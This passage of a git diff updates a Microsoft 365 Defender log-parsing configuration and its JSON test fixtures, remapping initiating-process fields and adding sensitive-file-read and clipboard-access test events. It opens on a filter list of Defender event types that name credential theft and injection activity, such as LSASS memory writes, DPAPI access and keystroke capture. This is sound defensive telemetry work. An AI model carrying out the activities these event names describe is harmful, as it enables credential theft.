"appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields @@ -126,22 +130,6 @@ stages: host.os.full: "{{json_event.message.properties.OSPlatform}}" host.os.version: "{{json_event.message.properties.OSVersion}}" host.type: "{{json_event.message.properties.DeviceType}}" - process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" - process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" - process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" - process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" - process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" - process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" - process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" - process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" registry.data.type: "{{json_event.message.properties.RegistryValueType}}" registry.key: "{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" @@ -166,18 +154,6 @@ stages: action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}" action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}" action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}" - action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}" action.properties.Location: "{{json_event.message.properties.Location}}" action.properties.LogonId: "{{json_event.message.properties.LogonId}}" @@ -250,12 +226,6 @@ stages: - set: user.roles: '["{{json_event.message.properties.AccountType}}"]' filter: '{{json_event.message.properties.get("AccountType")}}' - - set: - process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}' - - set: - process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}' - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' @@ -274,6 +244,98 @@ stages: } filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + set_process_events: + actions: + - set: + process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" + process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" + process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" + action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + + set_process_deviceprocess_events: + actions: + - set: + process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.pid: "{{json_event.message.properties.ProcessId}}" + process.start: "{{json_event.message.properties.ProcessCreationTime}}" + process.name: "{{json_event.message.properties.FileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" + process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" + action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + set_alert_evidence_fields: actions: - set: @@ -356,7 +418,7 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: @@ -469,15 +531,15 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json index ca708b0ed..17cad5081 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json new file mode 100644 index 000000000..fedd99aea --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -0,0 +1,100 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "process": { + "parent": { + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" + } + } + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "name": "FileName.mdb", + "parent": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "working_directory": "C:" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json similarity index 98% rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 1f1351d52..494baa569 100644 --- a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -16,7 +16,11 @@ "@timestamp": "2024-10-22T15:09:08.851712Z", "action": { "properties": { - "InitiatingProcessLogonId": "0" + "process": { + "parent": { + "LogonId": "0" + } + } }, "type": "ScriptContent" }, @@ -38,10 +42,9 @@ }, "process": { "parent": { - "pid": 0 - }, - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" + } }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json new file mode 100644 index 000000000..c34cefa50 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json @@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft 